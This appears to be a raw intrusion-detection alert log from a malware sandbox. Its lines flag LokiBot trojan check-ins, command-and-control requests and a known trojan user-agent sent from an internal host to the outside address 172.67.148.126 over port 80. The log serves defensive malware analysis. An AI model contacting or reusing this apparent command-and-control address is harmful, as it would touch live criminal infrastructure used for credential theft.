                                                04/06/24-09:30:09.757970TCP2025381ET TROJAN LokiBot Checkin4977780192.168.2.6172.67.148.126
                                                04/06/24-09:30:44.269499TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982380192.168.2.6172.67.148.126
                                                04/06/24-09:31:03.891737TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984680192.168.2.6172.67.148.126
                                                04/06/24-09:29:57.360186TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976380192.168.2.6172.67.148.126
                                                04/06/24-09:30:30.339047TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980580192.168.2.6172.67.148.126
                                                04/06/24-09:30:04.359604TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977280192.168.2.6172.67.148.126
                                                04/06/24-09:30:15.205072TCP2825766ETPRO TROJAN LokiBot Checkin M24978680192.168.2.6172.67.148.126
                                                04/06/24-09:30:17.895022TCP2825766ETPRO TROJAN LokiBot Checkin M24978980192.168.2.6172.67.148.126
                                                04/06/24-09:29:55.812911TCP2025381ET TROJAN LokiBot Checkin4976180192.168.2.6172.67.148.126
                                                04/06/24-09:30:06.739588TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977580192.168.2.6172.67.148.126
                                                04/06/24-09:30:06.739588TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977580192.168.2.6172.67.148.126
                                                04/06/24-09:30:31.907019TCP2025381ET TROJAN LokiBot Checkin4980780192.168.2.6172.67.148.126
                                                04/06/24-09:31:14.663983TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986180192.168.2.6172.67.148.126
                                                04/06/24-09:31:06.999341TCP2025381ET TROJAN LokiBot Checkin4985080192.168.2.6172.67.148.126
                                                04/06/24-09:30:42.736556TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982180192.168.2.6172.67.148.126
                                                04/06/24-09:29:41.115114TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974480192.168.2.6172.67.148.126
                                                04/06/24-09:29:42.690473TCP2025381ET TROJAN LokiBot Checkin4974680192.168.2.6172.67.148.126
                                                04/06/24-09:30:52.096160TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24983380192.168.2.6172.67.148.126
                                                04/06/24-09:29:43.454363TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974780192.168.2.6172.67.148.126
                                                04/06/24-09:30:53.641650TCP2025381ET TROJAN LokiBot Checkin4983580192.168.2.6172.67.148.126
                                                04/06/24-09:30:54.422589TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983680192.168.2.6172.67.148.126
                                                04/06/24-09:30:45.042075TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982480192.168.2.6172.67.148.126
                                                04/06/24-09:29:41.115114TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974480192.168.2.6172.67.148.126
                                                04/06/24-09:29:43.454363TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974780192.168.2.6172.67.148.126
                                                04/06/24-09:30:33.437852TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980980192.168.2.6172.67.148.126
                                                04/06/24-09:29:45.018070TCP2025381ET TROJAN LokiBot Checkin4974980192.168.2.6172.67.148.126
                                                04/06/24-09:30:54.422589TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24983680192.168.2.6172.67.148.126
                                                04/06/24-09:30:55.998033TCP2025381ET TROJAN LokiBot Checkin4983880192.168.2.6172.67.148.126
                                                04/06/24-09:30:52.096160TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983380192.168.2.6172.67.148.126
                                                04/06/24-09:30:17.112021TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978880192.168.2.6172.67.148.126
                                                04/06/24-09:30:05.891670TCP2025381ET TROJAN LokiBot Checkin4977480192.168.2.6172.67.148.126
                                                04/06/24-09:30:32.673178TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980880192.168.2.6172.67.148.126
                                                04/06/24-09:30:05.124910TCP2825766ETPRO TROJAN LokiBot Checkin M24977380192.168.2.6172.67.148.126
                                                04/06/24-09:31:15.463121TCP2825766ETPRO TROJAN LokiBot Checkin M24986280192.168.2.6172.67.148.126
                                                04/06/24-09:29:25.556361TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14971980192.168.2.6172.67.148.126
                                                04/06/24-09:30:17.112021TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978880192.168.2.6172.67.148.126
                                                04/06/24-09:30:42.736556TCP2825766ETPRO TROJAN LokiBot Checkin M24982180192.168.2.6172.67.148.126
                                                04/06/24-09:30:41.966393TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982080192.168.2.6172.67.148.126
                                                04/06/24-09:31:06.206380TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984980192.168.2.6172.67.148.126
                                                04/06/24-09:30:17.895022TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978980192.168.2.6172.67.148.126
                                                04/06/24-09:29:25.556361TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24971980192.168.2.6172.67.148.126
                                                04/06/24-09:30:41.966393TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982080192.168.2.6172.67.148.126
                                                04/06/24-09:29:55.035047TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976080192.168.2.6172.67.148.126
                                                04/06/24-09:30:43.503603TCP2025381ET TROJAN LokiBot Checkin4982280192.168.2.6172.67.148.126
                                                04/06/24-09:31:06.206380TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984980192.168.2.6172.67.148.126
                                                04/06/24-09:31:17.815577TCP2025381ET TROJAN LokiBot Checkin4986380192.168.2.6172.67.148.126
                                                04/06/24-09:30:32.673178TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980880192.168.2.6172.67.148.126
                                                04/06/24-09:29:34.860100TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973180192.168.2.6172.67.148.126
                                                04/06/24-09:29:34.860100TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973180192.168.2.6172.67.148.126
                                                04/06/24-09:30:04.359604TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977280192.168.2.6172.67.148.126
                                                04/06/24-09:30:33.437852TCP2825766ETPRO TROJAN LokiBot Checkin M24980980192.168.2.6172.67.148.126
                                                04/06/24-09:29:44.242163TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974880192.168.2.6172.67.148.126
                                                04/06/24-09:30:55.220105TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983780192.168.2.6172.67.148.126
                                                04/06/24-09:31:14.663983TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986180192.168.2.6172.67.148.126
                                                04/06/24-09:29:45.018070TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974980192.168.2.6172.67.148.126
                                                04/06/24-09:30:25.641172TCP2025381ET TROJAN LokiBot Checkin4979980192.168.2.6172.67.148.126
                                                04/06/24-09:29:46.581121TCP2825766ETPRO TROJAN LokiBot Checkin M24975180192.168.2.6172.67.148.126
                                                04/06/24-09:29:51.123133TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975580192.168.2.6172.67.148.126
                                                04/06/24-09:31:04.659572TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984780192.168.2.6172.67.148.126
                                                04/06/24-09:29:51.123133TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975580192.168.2.6172.67.148.126
                                                04/06/24-09:31:06.999341TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985080192.168.2.6172.67.148.126
                                                04/06/24-09:31:09.316933TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985380192.168.2.6172.67.148.126
                                                04/06/24-09:29:47.378472TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975280192.168.2.6172.67.148.126
                                                04/06/24-09:30:54.422589TCP2025381ET TROJAN LokiBot Checkin4983680192.168.2.6172.67.148.126
                                                04/06/24-09:31:09.316933TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985380192.168.2.6172.67.148.126
                                                04/06/24-09:30:11.314149TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978080192.168.2.6172.67.148.126
                                                04/06/24-09:30:28.779878TCP2025381ET TROJAN LokiBot Checkin4980380192.168.2.6172.67.148.126
                                                04/06/24-09:30:13.652600TCP2825766ETPRO TROJAN LokiBot Checkin M24978480192.168.2.6172.67.148.126
                                                04/06/24-09:29:38.799315TCP2025381ET TROJAN LokiBot Checkin4974180192.168.2.6172.67.148.126
                                                04/06/24-09:30:14.423119TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978580192.168.2.6172.67.148.126
                                                04/06/24-09:31:03.891737TCP2825766ETPRO TROJAN LokiBot Checkin M24984680192.168.2.6172.67.148.126
                                                04/06/24-09:30:19.440133TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979180192.168.2.6172.67.148.126
                                                04/06/24-09:29:44.242163TCP2825766ETPRO TROJAN LokiBot Checkin M24974880192.168.2.6172.67.148.126
                                                04/06/24-09:31:24.825007TCP2025381ET TROJAN LokiBot Checkin4987280192.168.2.6172.67.148.126
                                                04/06/24-09:29:31.298967TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972780192.168.2.6172.67.148.126
                                                04/06/24-09:30:43.503603TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982280192.168.2.6172.67.148.126
                                                04/06/24-09:29:31.298967TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972780192.168.2.6172.67.148.126
                                                04/06/24-09:29:59.690030TCP2025381ET TROJAN LokiBot Checkin4976680192.168.2.6172.67.148.126
                                                04/06/24-09:30:21.735500TCP2025381ET TROJAN LokiBot Checkin4979480192.168.2.6172.67.148.126
                                                04/06/24-09:30:32.673178TCP2025381ET TROJAN LokiBot Checkin4980880192.168.2.6172.67.148.126
                                                04/06/24-09:31:12.357168TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985880192.168.2.6172.67.148.126
                                                04/06/24-09:29:52.706701TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975780192.168.2.6172.67.148.126
                                                04/06/24-09:29:27.906071TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972280192.168.2.6172.67.148.126
                                                04/06/24-09:29:28.699735TCP2825766ETPRO TROJAN LokiBot Checkin M24972380192.168.2.6172.67.148.126
                                                04/06/24-09:30:50.516269TCP2025381ET TROJAN LokiBot Checkin4983180192.168.2.6172.67.148.126
                                                04/06/24-09:29:57.360186TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976380192.168.2.6172.67.148.126
                                                04/06/24-09:31:12.357168TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985880192.168.2.6172.67.148.126
                                                04/06/24-09:29:27.906071TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972280192.168.2.6172.67.148.126
                                                04/06/24-09:30:38.861510TCP2825766ETPRO TROJAN LokiBot Checkin M24981880192.168.2.6172.67.148.126
                                                04/06/24-09:29:57.360186TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976380192.168.2.6172.67.148.126
                                                04/06/24-09:30:08.980641TCP2825766ETPRO TROJAN LokiBot Checkin M24977680192.168.2.6172.67.148.126
                                                04/06/24-09:31:23.194950TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987080192.168.2.6172.67.148.126
                                                04/06/24-09:30:04.359604TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977280192.168.2.6172.67.148.126
                                                04/06/24-09:30:26.424765TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980080192.168.2.6172.67.148.126
                                                04/06/24-09:31:10.846749TCP2025381ET TROJAN LokiBot Checkin4985680192.168.2.6172.67.148.126
                                                04/06/24-09:30:33.437852TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980980192.168.2.6172.67.148.126
                                                04/06/24-09:30:31.133120TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980680192.168.2.6172.67.148.126
                                                04/06/24-09:30:02.046578TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976980192.168.2.6172.67.148.126
                                                04/06/24-09:30:26.424765TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980080192.168.2.6172.67.148.126
                                                04/06/24-09:30:55.998033TCP2825766ETPRO TROJAN LokiBot Checkin M24983880192.168.2.6172.67.148.126
                                                04/06/24-09:29:27.109787TCP2025381ET TROJAN LokiBot Checkin4972180192.168.2.6172.67.148.126
                                                04/06/24-09:30:59.991734TCP2825766ETPRO TROJAN LokiBot Checkin M24984180192.168.2.6172.67.148.126
                                                04/06/24-09:30:01.279270TCP2825766ETPRO TROJAN LokiBot Checkin M24976880192.168.2.6172.67.148.126
                                                04/06/24-09:31:03.119856TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984580192.168.2.6172.67.148.126
                                                04/06/24-09:31:20.136720TCP2825766ETPRO TROJAN LokiBot Checkin M24986680192.168.2.6172.67.148.126
                                                04/06/24-09:30:33.437852TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980980192.168.2.6172.67.148.126
                                                04/06/24-09:29:53.470085TCP2025381ET TROJAN LokiBot Checkin4975880192.168.2.6172.67.148.126
                                                04/06/24-09:31:00.769505TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984280192.168.2.6172.67.148.126
                                                04/06/24-09:30:47.361321TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982780192.168.2.6172.67.148.126
                                                04/06/24-09:31:03.119856TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984580192.168.2.6172.67.148.126
                                                04/06/24-09:29:41.115114TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974480192.168.2.6172.67.148.126
                                                04/06/24-09:29:34.860100TCP2825766ETPRO TROJAN LokiBot Checkin M24973180192.168.2.6172.67.148.126
                                                04/06/24-09:30:30.339047TCP2825766ETPRO TROJAN LokiBot Checkin M24980580192.168.2.6172.67.148.126
                                                04/06/24-09:30:15.205072TCP2025381ET TROJAN LokiBot Checkin4978680192.168.2.6172.67.148.126
                                                04/06/24-09:30:23.301208TCP2825766ETPRO TROJAN LokiBot Checkin M24979680192.168.2.6172.67.148.126
                                                04/06/24-09:30:03.603579TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977180192.168.2.6172.67.148.126
                                                04/06/24-09:30:44.269499TCP2025381ET TROJAN LokiBot Checkin4982380192.168.2.6172.67.148.126
                                                04/06/24-09:31:18.590588TCP2025381ET TROJAN LokiBot Checkin4986480192.168.2.6172.67.148.126
                                                04/06/24-09:30:48.181654TCP2025381ET TROJAN LokiBot Checkin4982880192.168.2.6172.67.148.126
                                                04/06/24-09:31:10.080334TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985580192.168.2.6172.67.148.126
                                                04/06/24-09:30:09.757970TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977780192.168.2.6172.67.148.126
                                                04/06/24-09:30:39.686953TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981980192.168.2.6172.67.148.126
                                                04/06/24-09:30:55.220105TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24983780192.168.2.6172.67.148.126
                                                04/06/24-09:31:22.429106TCP2025381ET TROJAN LokiBot Checkin4986980192.168.2.6172.67.148.126
                                                04/06/24-09:30:36.516498TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981480192.168.2.6172.67.148.126
                                                04/06/24-09:30:55.220105TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983780192.168.2.6172.67.148.126
                                                04/06/24-09:30:52.096160TCP2825766ETPRO TROJAN LokiBot Checkin M24983380192.168.2.6172.67.148.126
                                                04/06/24-09:29:38.036927TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974080192.168.2.6172.67.148.126
                                                04/06/24-09:30:59.991734TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984180192.168.2.6172.67.148.126
                                                04/06/24-09:30:45.042075TCP2025381ET TROJAN LokiBot Checkin4982480192.168.2.6172.67.148.126
                                                04/06/24-09:30:59.991734TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984180192.168.2.6172.67.148.126
                                                04/06/24-09:31:12.357168TCP2825766ETPRO TROJAN LokiBot Checkin M24985880192.168.2.6172.67.148.126
                                                04/06/24-09:29:36.488685TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973780192.168.2.6172.67.148.126
                                                04/06/24-09:30:02.046578TCP2825766ETPRO TROJAN LokiBot Checkin M24976980192.168.2.6172.67.148.126
                                                04/06/24-09:30:12.096911TCP2025381ET TROJAN LokiBot Checkin4978180192.168.2.6172.67.148.126
                                                04/06/24-09:30:26.424765TCP2825766ETPRO TROJAN LokiBot Checkin M24980080192.168.2.6172.67.148.126
                                                04/06/24-09:30:48.957388TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982980192.168.2.6172.67.148.126
                                                04/06/24-09:30:55.998033TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983880192.168.2.6172.67.148.126
                                                04/06/24-09:31:20.907030TCP2825766ETPRO TROJAN LokiBot Checkin M24986780192.168.2.6172.67.148.126
                                                04/06/24-09:30:46.592042TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982680192.168.2.6172.67.148.126
                                                04/06/24-09:29:48.178974TCP2025381ET TROJAN LokiBot Checkin4975380192.168.2.6172.67.148.126
                                                04/06/24-09:30:53.641650TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983580192.168.2.6172.67.148.126
                                                04/06/24-09:30:55.998033TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24983880192.168.2.6172.67.148.126
                                                04/06/24-09:30:00.493399TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976780192.168.2.6172.67.148.126
                                                04/06/24-09:30:02.814837TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977080192.168.2.6172.67.148.126
                                                04/06/24-09:30:27.203747TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980180192.168.2.6172.67.148.126
                                                04/06/24-09:31:23.194950TCP2825766ETPRO TROJAN LokiBot Checkin M24987080192.168.2.6172.67.148.126
                                                04/06/24-09:30:48.957388TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982980192.168.2.6172.67.148.126
                                                04/06/24-09:30:03.603579TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977180192.168.2.6172.67.148.126
                                                04/06/24-09:31:14.663983TCP2825766ETPRO TROJAN LokiBot Checkin M24986180192.168.2.6172.67.148.126
                                                04/06/24-09:30:34.204192TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981080192.168.2.6172.67.148.126
                                                04/06/24-09:31:13.897343TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986080192.168.2.6172.67.148.126
                                                04/06/24-09:30:37.305241TCP2025381ET TROJAN LokiBot Checkin4981580192.168.2.6172.67.148.126
                                                04/06/24-09:30:00.493399TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976780192.168.2.6172.67.148.126
                                                04/06/24-09:30:04.359604TCP2825766ETPRO TROJAN LokiBot Checkin M24977280192.168.2.6172.67.148.126
                                                04/06/24-09:30:01.279270TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976880192.168.2.6172.67.148.126
                                                04/06/24-09:31:06.206380TCP2025381ET TROJAN LokiBot Checkin4984980192.168.2.6172.67.148.126
                                                04/06/24-09:29:37.260471TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973980192.168.2.6172.67.148.126
                                                04/06/24-09:30:27.203747TCP2825766ETPRO TROJAN LokiBot Checkin M24980180192.168.2.6172.67.148.126
                                                04/06/24-09:31:11.610579TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985780192.168.2.6172.67.148.126
                                                04/06/24-09:30:24.081982TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979780192.168.2.6172.67.148.126
                                                04/06/24-09:31:01.546959TCP2025381ET TROJAN LokiBot Checkin4984380192.168.2.6172.67.148.126
                                                04/06/24-09:29:37.260471TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973980192.168.2.6172.67.148.126
                                                04/06/24-09:29:51.920859TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975680192.168.2.6172.67.148.126
                                                04/06/24-09:30:57.593507TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984080192.168.2.6172.67.148.126
                                                04/06/24-09:29:30.251229TCP2025381ET TROJAN LokiBot Checkin4972580192.168.2.6172.67.148.126
                                                04/06/24-09:31:11.610579TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985780192.168.2.6172.67.148.126
                                                04/06/24-09:31:17.815577TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986380192.168.2.6172.67.148.126
                                                04/06/24-09:30:02.814837TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977080192.168.2.6172.67.148.126
                                                04/06/24-09:30:57.593507TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984080192.168.2.6172.67.148.126
                                                04/06/24-09:30:01.279270TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976880192.168.2.6172.67.148.126
                                                04/06/24-09:29:33.293191TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972880192.168.2.6172.67.148.126
                                                04/06/24-09:29:46.581121TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975180192.168.2.6172.67.148.126
                                                04/06/24-09:30:17.112021TCP2825766ETPRO TROJAN LokiBot Checkin M24978880192.168.2.6172.67.148.126
                                                04/06/24-09:30:22.504191TCP2025381ET TROJAN LokiBot Checkin4979580192.168.2.6172.67.148.126
                                                04/06/24-09:31:00.769505TCP2825766ETPRO TROJAN LokiBot Checkin M24984280192.168.2.6172.67.148.126
                                                04/06/24-09:29:33.293191TCP2825766ETPRO TROJAN LokiBot Checkin M24972880192.168.2.6172.67.148.126
                                                04/06/24-09:30:35.733011TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981280192.168.2.6172.67.148.126
                                                04/06/24-09:30:46.592042TCP2825766ETPRO TROJAN LokiBot Checkin M24982680192.168.2.6172.67.148.126
                                                04/06/24-09:29:28.699735TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972380192.168.2.6172.67.148.126
                                                04/06/24-09:31:19.370644TCP2025381ET TROJAN LokiBot Checkin4986580192.168.2.6172.67.148.126
                                                04/06/24-09:29:28.699735TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972380192.168.2.6172.67.148.126
                                                04/06/24-09:30:03.603579TCP2825766ETPRO TROJAN LokiBot Checkin M24977180192.168.2.6172.67.148.126
                                                04/06/24-09:30:23.301208TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979680192.168.2.6172.67.148.126
                                                04/06/24-09:31:20.907030TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986780192.168.2.6172.67.148.126
                                                04/06/24-09:30:13.652600TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978480192.168.2.6172.67.148.126
                                                04/06/24-09:30:20.970310TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979380192.168.2.6172.67.148.126
                                                04/06/24-09:30:35.733011TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981280192.168.2.6172.67.148.126
                                                04/06/24-09:31:21.669304TCP2025381ET TROJAN LokiBot Checkin4986880192.168.2.6172.67.148.126
                                                04/06/24-09:30:10.531874TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977880192.168.2.6172.67.148.126
                                                04/06/24-09:30:23.301208TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979680192.168.2.6172.67.148.126
                                                04/06/24-09:30:56.772335TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983980192.168.2.6172.67.148.126
                                                04/06/24-09:29:40.344957TCP2825766ETPRO TROJAN LokiBot Checkin M24974380192.168.2.6172.67.148.126
                                                04/06/24-09:30:12.861151TCP2025381ET TROJAN LokiBot Checkin4978280192.168.2.6172.67.148.126
                                                04/06/24-09:31:23.961991TCP2025381ET TROJAN LokiBot Checkin4987180192.168.2.6172.67.148.126
                                                04/06/24-09:30:56.772335TCP2825766ETPRO TROJAN LokiBot Checkin M24983980192.168.2.6172.67.148.126
                                                04/06/24-09:30:34.975531TCP2025381ET TROJAN LokiBot Checkin4981180192.168.2.6172.67.148.126
                                                04/06/24-09:30:45.801533TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982580192.168.2.6172.67.148.126
                                                04/06/24-09:31:20.136720TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986680192.168.2.6172.67.148.126
                                                04/06/24-09:31:03.119856TCP2825766ETPRO TROJAN LokiBot Checkin M24984580192.168.2.6172.67.148.126
                                                04/06/24-09:31:08.547895TCP2025381ET TROJAN LokiBot Checkin4985280192.168.2.6172.67.148.126
                                                04/06/24-09:31:20.136720TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986680192.168.2.6172.67.148.126
                                                04/06/24-09:29:39.580792TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974280192.168.2.6172.67.148.126
                                                04/06/24-09:29:51.920859TCP2825766ETPRO TROJAN LokiBot Checkin M24975680192.168.2.6172.67.148.126
                                                04/06/24-09:29:29.470677TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972480192.168.2.6172.67.148.126
                                                04/06/24-09:29:39.580792TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974280192.168.2.6172.67.148.126
                                                04/06/24-09:30:24.862546TCP2025381ET TROJAN LokiBot Checkin4979880192.168.2.6172.67.148.126
                                                04/06/24-09:29:58.921065TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976580192.168.2.6172.67.148.126
                                                04/06/24-09:30:31.907019TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980780192.168.2.6172.67.148.126
                                                04/06/24-09:30:45.801533TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982580192.168.2.6172.67.148.126
                                                04/06/24-09:31:05.441892TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984880192.168.2.6172.67.148.126
                                                04/06/24-09:30:24.081982TCP2825766ETPRO TROJAN LokiBot Checkin M24979780192.168.2.6172.67.148.126
                                                04/06/24-09:29:52.706701TCP2825766ETPRO TROJAN LokiBot Checkin M24975780192.168.2.6172.67.148.126
                                                04/06/24-09:29:42.690473TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974680192.168.2.6172.67.148.126
                                                04/06/24-09:30:55.998033TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983880192.168.2.6172.67.148.126
                                                04/06/24-09:30:20.970310TCP2025381ET TROJAN LokiBot Checkin4979380192.168.2.6172.67.148.126
                                                04/06/24-09:29:43.454363TCP2025381ET TROJAN LokiBot Checkin4974780192.168.2.6172.67.148.126
                                                04/06/24-09:30:57.593507TCP2825766ETPRO TROJAN LokiBot Checkin M24984080192.168.2.6172.67.148.126
                                                04/06/24-09:29:55.812911TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976180192.168.2.6172.67.148.126
                                                04/06/24-09:29:42.690473TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974680192.168.2.6172.67.148.126
                                                04/06/24-09:30:06.739588TCP2025381ET TROJAN LokiBot Checkin4977580192.168.2.6172.67.148.126
                                                04/06/24-09:31:15.463121TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986280192.168.2.6172.67.148.126
                                                04/06/24-09:30:27.203747TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980180192.168.2.6172.67.148.126
                                                04/06/24-09:31:24.825007TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987280192.168.2.6172.67.148.126
                                                04/06/24-09:31:15.463121TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986280192.168.2.6172.67.148.126
                                                04/06/24-09:30:06.739588TCP2825766ETPRO TROJAN LokiBot Checkin M24977580192.168.2.6172.67.148.126
                                                04/06/24-09:30:33.437852TCP2025381ET TROJAN LokiBot Checkin4980980192.168.2.6172.67.148.126
                                                04/06/24-09:31:10.846749TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985680192.168.2.6172.67.148.126
                                                04/06/24-09:29:37.260471TCP2825766ETPRO TROJAN LokiBot Checkin M24973980192.168.2.6172.67.148.126
                                                04/06/24-09:30:27.203747TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980180192.168.2.6172.67.148.126
                                                04/06/24-09:30:24.081982TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979780192.168.2.6172.67.148.126
                                                04/06/24-09:29:25.556361TCP2025381ET TROJAN LokiBot Checkin4971980192.168.2.6172.67.148.126
                                                04/06/24-09:30:48.181654TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982880192.168.2.6172.67.148.126
                                                04/06/24-09:29:43.454363TCP2825766ETPRO TROJAN LokiBot Checkin M24974780192.168.2.6172.67.148.126
                                                04/06/24-09:31:07.768549TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985180192.168.2.6172.67.148.126
